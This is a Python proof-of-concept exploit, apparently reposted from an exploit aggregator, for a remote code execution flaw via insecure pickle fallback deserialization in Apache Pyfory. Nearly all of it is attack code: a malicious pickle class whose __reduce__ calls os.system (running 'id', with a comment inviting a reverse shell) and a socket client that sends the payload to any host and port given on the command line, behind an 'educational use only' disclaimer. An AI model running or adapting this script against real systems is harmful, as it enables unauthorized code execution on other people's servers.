Share
## https://sploitus.com/exploit?id=PACKETSTORM:210147
#!/usr/bin/env python3
    """
    ===========================================================================
    CVE-2025-61622 Proof of Concept (PoC)
    Author: SK Rahimul Haque
    Contact: skrahimulhaque96@gmail.com/https://www.linkedin.com/in/sk-rahimul-haque-51538522a/
    Date: 2025-10-03
    ===========================================================================
    
    Description:
    This PoC demonstrates the Remote Code Execution (RCE) vulnerability in 
    Apache Pyfory (versions 0.12.0-0.12.2 and legacy PyFury 0.1.0-0.10.3) 
    due to insecure pickle fallback deserialization (CVE-2025-61622).
    
    Disclaimer:
    This code is for educational and authorized testing purposes only.
    Do not use for unauthorized activities. The author assumes no liability 
    for misuse or damage caused by this script.
    
    License: MIT License (Optional: Add if applicable)
    ===========================================================================
    """
    
    import pickle
    import socket
    import os
    import sys
    
    # --- Banner ---
    def print_banner():
        banner = """
    โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
    โ•‘                CVE-2025-61622 PoC Exploit                    โ•‘
    โ•‘                 Author: SK Rahimul Haque                     โ•‘
    โ•‘               Educational Use Only - Do Not Misuse           โ•‘
    โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
        """
        print(banner)
    
    # --- Payload Class ---
    class RCEPayload:
        def __reduce__(self):
            # Reverse shell command (adjust IP/port as needed)
            cmd = "id"
            return (os.system, (cmd,))
    
    # --- Exploit Functions ---
    def create_exploit():
        """Generate malicious pickle payload."""
        print("[*] Creating malicious payload...")
        return pickle.dumps(RCEPayload())
    
    def exploit_target(target_host, target_port):
        """Send payload to vulnerable Pyfory application."""
        payload = create_exploit()
        
        try:
            print(f"[*] Connecting to {target_host}:{target_port}...")
            client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            client.connect((target_host, target_port))
            print("[+] Connection established.")
            
            print("[*] Sending payload...")
            client.send(payload)
            print("[+] Payload sent successfully!")
            
            client.close()
        except Exception as e:
            print(f"[-] Exploit failed: {e}")
    
    # --- Main Execution ---
    if __name__ == "__main__":
        print_banner()
        
        if len(sys.argv) != 3:
            print("Usage: python cve_2025_61622_poc.py <target_host> <target_port>")
            print("Example: python cve_2025_61622_poc.py 127.0.0.1 9000")
            sys.exit(1)
        
        target_host = sys.argv[1]
        target_port = int(sys.argv[2])
        
        exploit_target(target_host, target_port)